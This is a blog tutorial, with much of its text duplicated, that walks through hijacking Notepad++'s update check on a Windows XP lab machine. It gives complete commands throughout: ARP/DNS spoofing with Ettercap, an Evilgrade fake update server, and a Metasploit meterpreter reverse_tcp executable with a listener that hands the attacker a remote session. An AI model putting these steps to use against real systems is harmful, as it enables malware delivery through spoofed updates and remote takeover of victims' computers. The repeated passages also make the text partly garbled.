To convey this attack, I use following tools.
Metasploit (msfpayload and multi/handler exploit)
ISR-Evilgrade
Ettercap
Attacker's computer - BackTrack Virtual Machine ( IP: 192.168.78.8 )
Victim's computer - Windows XP sp2 Virtual Machine ( IP:192.168.78.9 ; on the same network with Attacker's computer)
Vulnerable Notepad++ installed on victim's machine.
Since all of those are contained in BackTrack, I am using BackTrack for this attack. Otherwise you can seperately download and install Evilgrade on a linux machine. You can download vulnerable notepad++ version from below link.
So lets start.
Procedure :-
- Once the victim check's for Notepad++ updates, that request is spoofed to a fake web server created by Evilgrade which hosts the malware. This request spoof is done using DNS spoofing with Ettercap.
- Then user gets a message saying that an update is available and when he downloads it, hosted malware is downloaded to his machine and gets executed.
- We creates this malware using Metasploit's msfpayload which connects back to the attacker's machine and gives attacker the controller of the victim's machine through a meterpreter session.
- Once the meterpreter session is opened in attacker's computer attack is completed and then post-exploitations can be done using meterpreter session
Starting Evilgrade
In BackTrack 5, Evilgrade is located at,
/pentest/exploits/isr-evilgrade/ folder
We can go into that folder and start evilgrade using
./evilgrade command
Then you will see Evilgrade starts.
In Evilgrade, there are a set of modules (in this case, 63) available to attack a popular set of software. You can view this list simply running show modules command.
Since we are going to attack Notepad++ we can use notepadplus module. To select that module run following command. You can see available options for this module using show options command.
configure notepadplus
show options
You can see that there is an option called "agent". This is simply the malware that we are going to inject. We should create a malware for our particular purpose using metasploit and then we can use it as the agent for Evilgrade. Keep this Evilgrade terminal alive aside and lets create the malware next.
I am going to use Metasploit's msfpayload for creating a malware using meterpreter/reverse_tcp payload. I create this malware as a .exe file and save it as /root/a.exe. This command does it for me. Open a new terminal and execute following command.
msfpayload windows/meterpreter/reverse_tcp LHOST="192.168.78.8" LPORT=4444 X > /root/a.exe
LHOST means the IP address of the attacker's (your's) BackTrack machine and LPORT is the port which the malware should connect back. You can use any other free port for this. But I'll keep it as the default one '4444'.
Then the malware will be created as a.exe and will be stored in /root/ folder.
Then we have created the malware, we can use it in Evilgrade for the attack. What we have to do next is spoofing victim's update request to the server hosted by Evilgrade (which is the attacker's backtrack machine)
Now look at the options in Evilgrade for notepadplus again.
There is an option called VirtualHost which is "notepad-plus.sourceforge.net". This is the website which Notepad++ requests for updates. Using DNS Spoofing we spoof this request to "notepad-plus.sourceforge.net" to our BackTrack machine where Evilgrade runs. We can use Ettercap for this. ( I have previously posted how to use Ettercap for DNS Spoofing.)
Add an entry for this in etter.dns file and start DNS spoofing as follows.
Then start DNS Spoof by executing following command.
ettercap -T -Q -M arp -P dns_spoof /192.168.78.8/ //
Use your BackTrack machine's IP address for the above command instead of 192.168.78.8.
Then you will see DNS spoofing is running. Now go to Attacker's machine, and lets start Evilgrader Web server.
Go to the terminal that Evilgrade is opened. What we have to do now is start the Evilgrade webserver and set agent to our malware. Execute following command and set agent to our malware, /root/a.exe
set agent '["/root/a.exe"]'
Note carefully the syntax of the above command.
Then start Evilgrade webserver using start command in Evilgrade.
start
Then you should see a web server and a DNS server starts and they are listening for connections.
Open another new terminal and start metasploit.
msfconsole
After metasploit started, start Multi Handler in metasploit
msf > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.78.8
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > exploit
Then the multi handler starts and starts listening for an incoming connection from the malware.
Now we have done all work.
Lets's see how attack happens.
Then you will see something is going on in the terminals which Ettercap is running and Evilgrade is running.
And also you'll see Evilgrade is responding to the update request.
Click Yes again and Notepad++ will be closed. You will notice in the Evilgrade, that our malware /root/a.exe is downloaded by Notepad++ and executed.
As it is executed, It tries to connect back to the attacking machine. Since we are running a listener in Metasploit, it connects with Metasploit and opens a Meterpreter Session for you.
/pentest/exploits/isr-evilgrade/ folder
We can go into that folder and start evilgrade using
./evilgrade command
configure notepadplus
show options
Creating Malware
Lets create a malware which connects back to the attacker's computer and opens a meterpreter session for attacker.Note: I am not going to describe how meterpreter session can be used to do various things on victim's computer. You can find out easily in web what meterpreter can do
I am going to use Metasploit's msfpayload for creating a malware using meterpreter/reverse_tcp payload. I create this malware as a .exe file and save it as /root/a.exe. This command does it for me. Open a new terminal and execute following command.
msfpayload windows/meterpreter/reverse_tcp LHOST="192.168.78.8" LPORT=4444 X > /root/a.exe
LHOST means the IP address of the attacker's (your's) BackTrack machine and LPORT is the port which the malware should connect back. You can use any other free port for this. But I'll keep it as the default one '4444'.
Then we have created the malware, we can use it in Evilgrade for the attack. What we have to do next is spoofing victim's update request to the server hosted by Evilgrade (which is the attacker's backtrack machine)
Now look at the options in Evilgrade for notepadplus again.
There is an option called VirtualHost which is "notepad-plus.sourceforge.net". This is the website which Notepad++ requests for updates. Using DNS Spoofing we spoof this request to "notepad-plus.sourceforge.net" to our BackTrack machine where Evilgrade runs. We can use Ettercap for this. ( I have previously posted how to use Ettercap for DNS Spoofing.)
Add an entry for this in etter.dns file and start DNS spoofing as follows.
ettercap -T -Q -M arp -P dns_spoof /192.168.78.8/ //
Use your BackTrack machine's IP address for the above command instead of 192.168.78.8.
Then you will see DNS spoofing is running. Now go to Attacker's machine, and lets start Evilgrader Web server.
Go to the terminal that Evilgrade is opened. What we have to do now is start the Evilgrade webserver and set agent to our malware. Execute following command and set agent to our malware, /root/a.exe
set agent '["/root/a.exe"]'
Then start Evilgrade webserver using start command in Evilgrade.
start
Then you should see a web server and a DNS server starts and they are listening for connections.
Final Step - Start a listener in Metasploit
We have now done 95% of work. Since our malware connects back to our machine from the victim's machine, we should have a listener running in our machine for an incoming connection from the malware. For this, we can use Multi Handler module in Metasploit.Open another new terminal and start metasploit.
msfconsole
After metasploit started, start Multi Handler in metasploit
msf > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.78.8
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > exploit
Now we have done all work.
- We created the malware
- Hosted using Evilgrade and Evilgrade is listening for a connection
- DNS spoof attack is running on victim's machine which directs update requests to our malware hosting machine.
- A listener is running on our machine for an incoming connection from the malware.
Go to Victim's machine. In my case , it is a Windows XP sp2 virtual machine on the same network with Attacking machine.
Start Notepad++. And try to update.
We can see from Ettercap that the update request is spoofed to the malware hosting BackTrack machine.
While these are going on, you will see a notification from Notepad++ that an update is available and asking you whether to download it.
Now click Yes and let Notepad++ download and install the update that it says available.
When you click Yes, You'll see update is being downloaded and will give you a message saying as follows.
Congratulations!!!
You have successfully attacked Windows XP machine. !!!!
This post became really long than I thought. But I honestly hope that it would be helpful for you. Please leave a comment below if you have any idea to share. Thank you.
0 comments:
Post a Comment
Note: Only a member of this blog may post a comment.